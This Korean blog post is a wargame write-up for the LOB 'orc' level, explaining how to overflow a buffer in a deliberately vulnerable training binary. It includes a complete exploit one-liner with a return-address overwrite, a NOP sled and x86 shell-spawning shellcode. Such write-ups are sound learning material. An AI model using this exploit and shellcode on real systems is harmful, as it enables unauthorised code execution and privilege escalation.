728x90
| LOB 5 - orc write up |
환경변수 초기화 egghunter에 이어서 buffer 를 초기화하는 코드까지 추가되었다.
즉 직전 문제와 비교하면 버퍼에 쉘코드를 사용하지말고, 환경변수도 사용하지말라는건데
그 두 곳이 아닌 외부의 어딘가 쉘코드를 저장하라는 것이다.
strcpy 함수 호출 다음인 main+194를 bp로 걸고 버퍼 주소값을 확인한다.
버퍼가 차지하는 메모리에 RET를 주면 초기화 돼버리기때문에 스택에서 버퍼를 제외한 적당한 메모리주소를 주어야한다. 위에서 확인 되는 적당한 주소 0xbffffb34를 주고 그 뒤에 놉슬레드와 쉘코드를 주면
ret된 후 놉 슬레드를 타고 가서 쉘코드가 수행 될 것이다.
| ./wolfman `python -c 'print "A" * 44 + "\x34\xfb\xff\xbf" + "\x90"*500+"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80" '` |
스택프레임은 이전 문제와 동일하기때문에 생략했다.
728x90
'wargame > LOB' 카테고리의 다른 글
| [포너블] LOB 7 - darkelf (0) | 2021.10.03 |
|---|---|
| [포너블] LOB 6 - wolfman (0) | 2021.09.30 |
| [포너블] LOB 4 - goblin (0) | 2021.09.30 |
| [포너블] LOB 3 - cobolt (0) | 2021.09.26 |
| [포너블] LOB 2 - gremlin (0) | 2021.09.26 |
댓글